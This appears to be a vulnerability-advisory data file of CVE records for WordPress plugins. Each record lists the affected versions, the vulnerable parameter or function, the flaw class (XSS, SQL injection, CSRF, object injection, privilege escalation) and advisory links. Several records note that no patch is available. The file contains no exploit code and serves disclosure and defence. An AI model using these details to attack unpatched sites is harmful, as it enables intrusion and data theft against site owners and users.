{"CVE_ID":"CVE-2025-4670","slug":"easy-digital-downloads","versionImpact":"3.3.8.1","description":"The Easy Digital Downloads \u2013 eCommerce Payments and Subscriptions made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edd_receipt shortcode in all versions up to, and including, 3.3.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301852\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301852\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-digital-downloads\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-digital-downloads\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c5bfc5-53b3-482f-856b-db6b6cac93a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95c5bfc5-53b3-482f-856b-db6b6cac93a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11405","slug":"wp-front-end-login-and-register","versionImpact":"2.1.0","description":"The WP Front-end login and register plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the email and wpmp_reset_password_token parameters in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-front-end-login-and-register\\\/trunk\\\/public\\\/partials\\\/wpmp-resetpassword-form.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-front-end-login-and-register\\\/trunk\\\/public\\\/partials\\\/wpmp-resetpassword-form.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54c1a85-13f6-48c0-9db8-860b4b1f3e45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54c1a85-13f6-48c0-9db8-860b4b1f3e45?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1509","slug":"gmace","versionImpact":"1.5.2","description":"The GMAce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.2. This is due to missing nonce validation on the gmace_manager_server function called via the wp_ajax_gmace_manager AJAX action. This makes it possible for unauthenticated attackers to modify arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/gmace.php?rev=1583327#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/gmace.php?rev=1583327#L84\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/inc\\\/filemanager.php?rev=1583319#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gmace\\\/trunk\\\/inc\\\/filemanager.php?rev=1583319#L27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826b3913-9a37-4e15-80fd-b35cefb51af8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/826b3913-9a37-4e15-80fd-b35cefb51af8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2547","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'deleteUser' function in versions starting from 1.0.7 up to, and including, 1.1.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete the temp user generated by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d58a6a4-de2c-485f-a8b0-7a7d144fbf3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d58a6a4-de2c-485f-a8b0-7a7d144fbf3c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2899","slug":"google-map-shortcode","versionImpact":"3.1.2","description":"The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92dcbeb3-17db-4d10-8ae7-c99acdb48c78\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92dcbeb3-17db-4d10-8ae7-c99acdb48c78\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1206","slug":"wp-recipe-maker","versionImpact":"9.1.2","description":"The WP Recipe Maker plugin for WordPress is vulnerable to SQL Injection via the 'recipes' parameter in all versions up to, and including, 9.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d8f8a-517f-4286-b501-0ca040529362?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b10d8f8a-517f-4286-b501-0ca040529362?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-mealplannerpro.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-mealplannerpro.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-recipecard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-recipecard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoom.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoom.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoomcpt.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-wpzoomcpt.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-yummly.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/import\\\/class-wprm-import-yummly.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/class-wprm-import-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032702\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/admin\\\/class-wprm-import-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1396","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title_tag\u2019 parameter in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/546aee7b-60a6-44bc-8664-0e917974cb6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/546aee7b-60a6-44bc-8664-0e917974cb6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L511\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L511\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L513\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/theme-elements\\\/site-title.php#L513\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7818","slug":"misiek-photo-album","versionImpact":"1.4.3","description":"The Misiek Photo Album WordPress plugin through 1.4.3 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2263b9-e1e7-4e86-8475-5e468eef1826\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2263b9-e1e7-4e86-8475-5e468eef1826\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12555","slug":"sip-calculator","versionImpact":"1.0","description":"The SIP Calculator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sip-calculator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sip-calculator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03afffcc-02fe-4054-8876-6a4e4d9de071?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03afffcc-02fe-4054-8876-6a4e4d9de071?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12313","slug":"woocommerce-compare-products","versionImpact":"3.2.1","description":"The Compare Products for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.2.1 via deserialization of untrusted input from the 'woo_compare_list' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L275\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/classes\\\/class-wc-compare-functions.php#L275\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/638e8e67-38b3-4fc4-bd77-8f268030a93a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13223","slug":"tabulate","versionImpact":"2.10.3","description":"The Tabulate WordPress plugin through 2.10.3 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3a52af1-7cb6-4361-b1c7-a50e0cc62fb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3a52af1-7cb6-4361-b1c7-a50e0cc62fb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0968","slug":"elementskit-lite","versionImpact":"3.4.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.0 due to missing capability checks on the get_megamenu_content() function. This makes it possible for unauthenticated attackers to view any item created in Elementor, such as posts, pages and templates including drafts, trashed and private items.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/megamenu\\\/api.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/megamenu\\\/api.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237243\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/432ac3b1-8f1d-442f-8e8d-62a1f26ba259?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/432ac3b1-8f1d-442f-8e8d-62a1f26ba259?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13232","slug":"wp-awesome-import-export","versionImpact":"4.1.1","description":"The WordPress Awesome Import & Export Plugin - Import & Export WordPress Data plugin for WordPress is vulnerable to arbitrary SQL Execution and privilege escalation due to a missing capability check on the renderImport() function in all versions up to, and including, 4.1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary SQL statements that can be leveraged to create a new administrative user account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-awesome-import-export-plugin-v-24\\\/12896266\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wordpress-awesome-import-export-plugin-v-24\\\/12896266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f24f0673-b5c8-4086-8795-692228a413af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f24f0673-b5c8-4086-8795-692228a413af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2542","slug":"your-simple-svg-support","versionImpact":"1.0.1","description":"The Your Simple SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/your-simple-svg-support\\\/tags\\\/1.0.0\\\/your-simple-svg-support.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259951\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259951\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/your-simple-svg-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/your-simple-svg-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aa9d836-4e13-4c6a-b1e6-a8f984805842?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aa9d836-4e13-4c6a-b1e6-a8f984805842?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5692","slug":"wp-leads-builder-any-crm","versionImpact":"3.1","description":"The Lead Form Data Collection to CRM plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the doFieldAjaxAction() function in all versions up to, and including, 3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. Other AJAX actions handling plugin settings are also insufficiently protected and exploitable.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-leads-builder-any-crm\\\/trunk\\\/includes\\\/Functions.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-leads-builder-any-crm\\\/trunk\\\/includes\\\/Functions.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319750%40wp-leads-builder-any-crm&new=3319750%40wp-leads-builder-any-crm&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319750%40wp-leads-builder-any-crm&new=3319750%40wp-leads-builder-any-crm&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-leads-builder-any-crm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-leads-builder-any-crm\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26404b5c-a0f2-4223-be61-1f03873666fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26404b5c-a0f2-4223-be61-1f03873666fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1575","slug":"mega_main_menu","versionImpact":"2.2.2","description":"The Mega Main Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via some of its settings parameters in versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a44ce6a3-0a9d-4bce-9251-f3a38b000645?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a44ce6a3-0a9d-4bce-9251-f3a38b000645?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mega-main-menu-wordpress-menu-plugin\\\/6135125\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/mega-main-menu-wordpress-menu-plugin\\\/6135125\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2545","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'getListOfUsers' function in versions starting from 1.0.7 up to, and including, 1.1.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to access the login links, which can be used for privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ab2178-7438-43ef-961e-b54d0d230f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ab2178-7438-43ef-961e-b54d0d230f4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L85\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4783","slug":"magee-shortcodes","versionImpact":"2.1.1","description":"The Magee Shortcodes WordPress plugin through 2.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02928db8-ceb3-471a-b626-ca661d073e4f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02928db8-ceb3-471a-b626-ca661d073e4f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22305","slug":"kali-forms","versionImpact":"2.3.36","description":"Authorization Bypass Through User-Controlled Key vulnerability in Kali Forms Contact Form builder with drag & drop for WordPress \u2013 Kali Forms. This issue affects Contact Form builder with drag & drop for WordPress \u2013 Kali Forms: from n\/a through 2.3.36.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kali-forms\\\/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kali-forms\\\/wordpress-kali-forms-plugin-2-3-38-insecure-direct-object-references-idor-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1172","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.7\\\/includes\\\/Elements\\\/Adv_Accordion.php#L1227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
